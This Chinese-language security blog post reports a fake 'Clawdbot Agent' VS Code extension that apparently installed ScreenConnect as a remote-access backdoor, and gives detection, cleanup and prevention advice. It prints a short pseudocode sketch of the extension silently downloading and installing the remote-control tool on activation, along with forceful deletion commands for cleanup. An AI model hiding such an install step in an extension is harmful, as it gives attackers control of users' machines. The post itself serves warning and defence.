假扩展真后门:VS Code 市场里的 Clawdbot 陷阱
有人在 VS Code Marketplace 搜"Clawdbot",装了第一个结果。
三小时后,他的电脑被远程控制了。
发生了什么
1 月 25 日,安全研究员 ReversingLabs 发现了一个名为"Clawdbot Agent"的 VS Code 扩展。
看起来很正经:
名称:Clawdbot Agent
发布者:ClawdBot-Official
描述:Official VS Code extension for Clawdbot AI assistant
安装量:4,200+
评分:4.8 星
实际干的事:
// 扩展激活时
exports.activate = function(context) {
// 1. 下载 ConnectWise ScreenConnect 安装包
const installer = download('https://cdn-relay.screenconnect.com/...');
// 2. 静默安装
exec(installer + ' /silent /norestart');
// 3. 连接到攻击者的控制服务器
// 攻击者获得你电脑的完全控制权
}
ConnectWise ScreenConnect 是一款合法的远程桌面软件,常被 IT 部门用来远程支持。但在这里,它被用来给攻击者开后门。
装了这个扩展,攻击者就能看你屏幕、操作你键盘、访问你文件。什么都能干。
为什么有人会装
Clawdbot 在 1 月中旬改名为 Moltbot。消息传得很快,但很多人还在用旧名字搜索。
攻击者看准了这个时机:
1 月 20 日:Clawdbot 宣布改名
1 月 21 日:假扩展上线
1 月 22-25 日:4000+ 次安装
1 月 25 日:被安全研究员发现
四天,四千多人中招。
扩展页面做得很逼真。有 logo,有详细描述,有虚假评论。发布者名字带"Official",普通用户很难分辨。
不止一个
ReversingLabs 顺藤摸瓜,发现这不是孤例。
同一批攻击者还发布了:
| 扩展名 | 伪装对象 | 安装量 | |--------|----------|--------| | Clawdbot Agent | Moltbot | 4,200+ | | Claude-AI-Helper | Claude | 2,100+ | | GPT-Cursor-Pro | Cursor | 1,800+ |
都是同样的套路:蹭热门 AI 工具的名字,装了就给你开后门。
总共超过 8000 次安装。
VS Code 市场的审核问题
为什么假扩展能上架?
微软的 VS Code Marketplace 审核流程是这样的:
1. 自动扫描:检查已知恶意代码签名
2. 人工审核:只针对被举报的扩展
3. 发布者验证:没有
问题出在第三点。任何人都能注册发布者账号,名字随便取。"ClawdBot-Official"这种名字,没有任何验证机制。
对比一下 npm:
npm:官方包有 verified publisher 标记
VS Code:没有官方认证机制
对比一下 Chrome Web Store:
Chrome:发布者需要支付 $5 注册费,有基本身份验证
VS Code:完全免费,无验证
门槛太低。
你可能已经中招了
检查一下:
# macOS/Linux
ls ~/.vscode/extensions/ | grep -i clawd
ls ~/.vscode/extensions/ | grep -i claude
# Windows
dir %USERPROFILE%\.vscode\extensions\ | findstr /i clawd
dir %USERPROFILE%\.vscode\extensions\ | findstr /i claude
如果有可疑的扩展,先别急着删。
检查有没有被装后门:
# macOS
ls /Applications/ | grep -i screen
ls /Applications/ | grep -i connect
# Windows
# 在"程序和功能"里找 ScreenConnect 或 ConnectWise
如果发现了 ScreenConnect 且你不记得装过,麻烦大了。
如果中招了
第一步:断网
立即断开网络连接,防止攻击者继续操作。
第二步:卸载后门
# macOS
sudo rm -rf /Applications/ScreenConnect*.app
launchctl unload ~/Library/LaunchAgents/*screenconnect*
# Windows - 在控制面板卸载 ScreenConnect Client
第三步:删除恶意扩展
rm -rf ~/.vscode/extensions/clawdbot*
第四步:改密码
假设所有在这台电脑上输入过的密码都已泄露:
- 邮箱密码
- GitHub token
- API keys
- 各种网站密码
全部改一遍。
第五步:检查异常
# 查看最近的登录活动
# GitHub: Settings > Security > Security log
# Google: myaccount.google.com > Security > Recent security events
如果你是公司电脑,通知 IT 部门。
怎么避免
规则 1:不搜名字,找官方链接
别在 VS Code 里直接搜扩展名。去官方网站找扩展链接。
错误:在 VS Code 搜索 "Clawdbot"
正确:去 moltbot.you 官网找扩展链接(目前没有官方 VS Code 扩展)
规则 2:看发布者历史
点进发布者主页,看看他发布过什么:
- 只有一个扩展?可疑
- 注册时间很近?可疑
- 名字带 Official 但没有认证?可疑
规则 3:看安装量增长
正常:缓慢增长,几个月积累到几千
可疑:几天内暴涨到几千
规则 4:读代码
VS Code 扩展是开源的(至少是可读的)。
# 找到扩展目录
cd ~/.vscode/extensions/extension-name/
# 看入口文件
cat extension.js | head -100
有 download、exec、spawn 这些调用的,仔细看看在干什么。
更大的问题
这次事件暴露的不是 VS Code 的问题,是整个开发者工具生态的问题。
过去一年,类似事件:
- npm:
node-ipc作者注入政治抗议代码 - PyPI:数十个包被发现挖矿
- GitHub Actions:多个第三方 action 被植入后门
- VS Code:这次的假 Clawdbot 扩展
开发者工具是攻击的高价值目标。一个恶意扩展可以接触到:
- 源代码
- API 密钥
- 数据库凭证
- SSH 私钥
- 浏览器 cookie
比钓鱼邮件效率高多了。
Moltbot 官方说什么
Peter Steinberger 在 X 上发帖:
"我们从未发布过 VS Code 扩展。任何声称是 Clawdbot/Moltbot 官方扩展的都是假的。目前唯一官方的安装方式是 npm install -g @moltbot/cli"
他还说正在考虑申请 VS Code Marketplace 的 verified publisher 认证,但流程很慢。
在那之前,别装任何声称是 Moltbot 官方的 VS Code 扩展。
这次 4000 多人中招,大多数可能还不知道。
你的同事、你关注的开发者、你团队里的人,可能就在其中。
发给他们看看吧。
参考资料
- ReversingLabs 安全报告
- VS Code Marketplace 发布者指南
- ConnectWise ScreenConnect 文档
- Peter Steinberger 的 X 帖子